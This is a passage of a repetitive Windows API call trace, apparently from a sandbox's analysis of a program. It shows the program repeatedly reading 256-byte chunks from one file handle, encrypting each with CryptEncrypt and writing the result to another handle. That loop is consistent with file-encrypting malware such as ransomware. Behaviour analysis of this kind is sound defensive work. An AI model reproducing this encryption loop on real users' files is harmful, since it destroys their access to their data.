pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.124] GetLastError () returned 0x0 [0164.124] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.124] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.124] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.124] GetLastError () returned 0x0 [0164.124] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.124] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.124] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.124] GetLastError () returned 0x0 [0164.124] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.124] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.124] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.124] GetLastError () returned 0x0 [0164.124] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.124] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.124] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.124] GetLastError () returned 0x0 [0164.124] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.125] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.125] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.125] GetLastError () returned 0x0 [0164.125] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.125] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.125] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.125] GetLastError () returned 0x0 [0164.125] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.125] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.125] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.125] GetLastError () returned 0x0 [0164.125] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.125] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.125] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.125] GetLastError () returned 0x0 [0164.125] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.125] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.125] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.125] GetLastError () returned 0x0 [0164.125] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.125] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.125] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.125] GetLastError () returned 0x0 [0164.125] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.125] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.126] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.126] GetLastError () returned 0x0 [0164.126] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.126] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.126] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.126] GetLastError () returned 0x0 [0164.126] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.126] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.126] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.126] GetLastError () returned 0x0 [0164.126] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.126] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.126] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.126] GetLastError () returned 0x0 [0164.126] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.126] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.126] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.126] GetLastError () returned 0x0 [0164.126] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.126] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.126] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.126] GetLastError () returned 0x0 [0164.126] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.126] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.126] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.126] GetLastError () returned 0x0 [0164.127] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.127] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.127] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.127] GetLastError () returned 0x0 [0164.127] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.127] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.127] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.127] GetLastError () returned 0x0 [0164.127] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.127] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.127] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.127] GetLastError () returned 0x0 [0164.127] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.127] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.127] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.127] GetLastError () returned 0x0 [0164.127] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.127] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.127] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.127] GetLastError () returned 0x0 [0164.127] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.127] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.128] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.128] GetLastError () returned 0x0 [0164.128] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.128] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.128] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.128] GetLastError () returned 0x0 [0164.128] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.128] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.128] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.128] GetLastError () returned 0x0 [0164.128] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.128] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.128] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.128] GetLastError () returned 0x0 [0164.128] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.128] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.128] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.128] GetLastError () returned 0x0 [0164.128] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.128] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.128] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.128] GetLastError () returned 0x0 [0164.128] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.129] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.129] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.129] GetLastError () returned 0x0 [0164.129] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.129] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.129] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.129] GetLastError () returned 0x0 [0164.129] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.129] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.129] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.129] GetLastError () returned 0x0 [0164.129] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.129] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.129] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.129] GetLastError () returned 0x0 [0164.129] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, 